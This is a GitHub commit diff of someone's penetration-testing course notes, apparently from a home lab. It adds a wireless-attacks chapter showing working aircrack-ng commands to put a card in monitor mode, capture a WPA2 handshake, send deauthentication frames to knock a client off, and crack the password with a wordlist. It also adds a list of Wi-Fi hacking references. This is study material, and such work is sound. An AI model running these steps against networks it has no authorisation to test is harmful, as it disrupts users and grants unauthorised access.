Skip to content

Commit 70a0a3c

Browse files
committed
WiFi Exploitation done
1 parent ed78541 commit 70a0a3c

File tree

6 files changed

+151
-3
lines changed

6 files changed

+151
-3
lines changed

peh/3-eth-hack/recon.md

+1-1
Original file line numberDiff line numberDiff line change
@@ -163,7 +163,7 @@ assetfinder --subs-only tesla.com
163163

164164
---
165165

166-
## Screenshoting websites
166+
## Screenshotting websites
167167

168168
➡️ [gowitness](https://github.com/sensepost/gowitness) - A golang, web screenshot utility using Chrome Headless
169169

Loading
Loading
Loading

peh/7-wireless/README.md

+139-1
Original file line numberDiff line numberDiff line change
@@ -1 +1,139 @@
1-
# 7. Wireless Attacks
1+
# 7. Wireless Attacks
2+
3+
## Wireless penetration testing
4+
5+
➡️ A **Wireless Penetration Test** involves the assessment of a wireless network’s security, including `WPA2-PSK` and `WPA2-Enterprise`, by:
6+
7+
- evaluating PSK strength
8+
- reviewing nearby networks
9+
- assessing guest networks
10+
- checking network access to identify vulnerabilities
11+
12+
**Tools**
13+
14+
- Wireless card (`e.g.` Alfa ... / Kali compatible adapters)
15+
- check [Best Kali Linux Compatible USB Adapters 2024 – WirelesSHack](https://www.wirelesshack.org/best-kali-linux-compatible-usb-adapter-dongles.html)
16+
- Router
17+
- Laptop
18+
19+
### The Hacking process (WPA2 PSK)
20+
21+
➡️ **Place**
22+
23+
- Place wireless card into monitor mode
24+
25+
➡️ **Discover**
26+
27+
- Discover information about network - Channel, BSSID, etc
28+
29+
➡️ **Select**
30+
31+
- Select network and capture data
32+
33+
➡️ **Perform**
34+
35+
- Perform deauthentication attack (optional)
36+
37+
➡️ **Capture**
38+
39+
- Capture WPA handshake
40+
41+
➡️ **Attempt**
42+
43+
- Attempt to crack the handshake to get the password
44+
45+
---
46+
47+
## WPAPS2 Exploit
48+
49+
> 📌 Check my [OpenWrt & WiFi Exploitation](https://blog.syselement.com/home/home-lab/misc/openwrt-wifi-hack) home lab done with a `TP-Link EAP225 v2` and OpenWrt for a more in depth setup process
50+
51+
[Aircrack-ng](https://www.aircrack-ng.org/doku.php?id=Main) is a complete suite of command line tools to assess WiFi network security.
52+
53+
- Connect the WiFi adapter to the host computer, and connect to the Kali VM
54+
55+
```bash
56+
# Check for card presence
57+
iwconfig
58+
59+
wlan0 IEEE 802.11 ESSID:off/any
60+
Mode:Managed Access Point: Not-Associated Tx-Power=20 dBm
61+
Retry short limit:7 RTS thr:off Fragment thr:off
62+
Power Management:on
63+
```
64+
65+
➡️ [airmon-ng](https://www.aircrack-ng.org/doku.php?id=airmon-ng)
66+
67+
- **Place** the card into monitor mode
68+
69+
```bash
70+
# Kill unnecessary processes
71+
sudo airmon-ng check kill
72+
73+
# Set card in monitor mode
74+
sudo airmon-ng start wlan0
75+
76+
PHY Interface Driver Chipset
77+
78+
phy0 wlan0 rtw_8822bu ASUSTek Computer, Inc. 802.11ac NIC
79+
(monitor mode enabled)
80+
81+
# Check
82+
iwconfig
83+
wlan0 IEEE 802.11 Mode:Monitor Frequency:2.457 GHz Tx-Power=20 dBm
84+
Retry short limit:7 RTS thr:off Fragment thr:off
85+
Power Management:on
86+
```
87+
88+
➡️ [airodump-ng](https://www.aircrack-ng.org/doku.php?id=airodump-ng)
89+
90+
- Search the area and **discover** SSIDs
91+
- **Select** the network to capture data from
92+
93+
```bash
94+
mkdir -p $HOME/tcm/peh/wifi && cd $HOME/tcm/peh/wifi
95+
96+
sudo airodump-ng wlan0
97+
98+
# Capture the handshake
99+
sudo airodump-ng -c 6 --bssid 22:66:CF:7D:D6:14 -w capture wlan0
100+
```
101+
102+
![airodump-ng](.gitbook/assets/image-20250221082555755.png)
103+
104+
➡️ A **Deauthentication (Deauth) Attack** is a type of **Wi-Fi denial-of-service (DoS) attack** where an attacker forcibly disconnects devices from a wireless network by sending **fake deauthentication frames** to the target device or access point, and capture the handshake when the device re-connects to the Wi-Fi network.
105+
106+
➡️ [aireplay-ng](https://www.aircrack-ng.org/doku.php?id=aireplay-ng)
107+
108+
- **Perform** de-auth attack and **capture** WPA handshake
109+
110+
```bash
111+
# De-auth attack
112+
sudo aireplay-ng -0 1 -a 22:66:CF:7D:D6:14 -c 48:E1:E9:E6:91:02 wlan0
113+
```
114+
115+
![aireplay-ng](.gitbook/assets/2025-02-21_08-33-58_895.png)
116+
117+
➡️ [aircrack-ng](https://www.kali.org/tools/aircrack-ng/)
118+
119+
- Attempt **cracking** of the captured handshakes
120+
121+
```bash
122+
ls
123+
124+
capture-01.cap
125+
capture-01.csv
126+
capture-01.kismet.csv
127+
capture-01.kismet.netxml
128+
capture-01.log.csv
129+
130+
# Create a wordlist, with the testing WiFi lab password
131+
132+
# Crack the handshake
133+
aircrack-ng -w wordlist.txt -b 22:66:CF:7D:D6:14 capture-01.cap
134+
```
135+
136+
![aircrack-ng](.gitbook/assets/2025-02-21_08-39-18_896.png)
137+
138+
---
139+

peh/peh-references.md

+11-1
Original file line numberDiff line numberDiff line change
@@ -228,7 +228,17 @@
228228

229229
## Wireless Penetration Testing
230230

231-
231+
- [Pentesting Wifi - HackTricks](https://book.hacktricks.wiki/en/generic-methodologies-and-resources/pentesting-wifi/index.html)
232+
- [ricardojoserf/wifi-pentesting-guide](https://github.com/ricardojoserf/wifi-pentesting-guide)
233+
- [Offensive Security Tool: WEF (WiFi Exploitation Framework) | Black Hat Ethical Hacking](https://www.blackhatethicalhacking.com/tools/wef-wifi-exploitation-framework/)
234+
- [D3Ext/WEF: Wi-Fi Exploitation Framework](https://github.com/D3Ext/WEF)
235+
- [Curso Gratis de Hacking Wifi | D3Ext](https://d3ext.github.io/posts/Curso/)
236+
237+
- [Best Kali Linux Compatible USB Adapters 2024 – WirelesSHack](https://www.wirelesshack.org/best-kali-linux-compatible-usb-adapter-dongles.html)
238+
- [OpenWrt & WiFi Exploitation | syselement's Blog](https://blog.syselement.com/home/home-lab/misc/openwrt-wifi-hack#hacking-time)
239+
- [aircrack-ng Usage](https://www.kali.org/tools/aircrack-ng/)
240+
- [airmon-ng](https://www.aircrack-ng.org/doku.php?id=airmon-ng)
241+
- [airodump-ng](https://www.aircrack-ng.org/doku.php?id=airodump-ng)
232242

233243
## Legal Documents and Report Writing
234244

0 commit comments

Comments
 (0)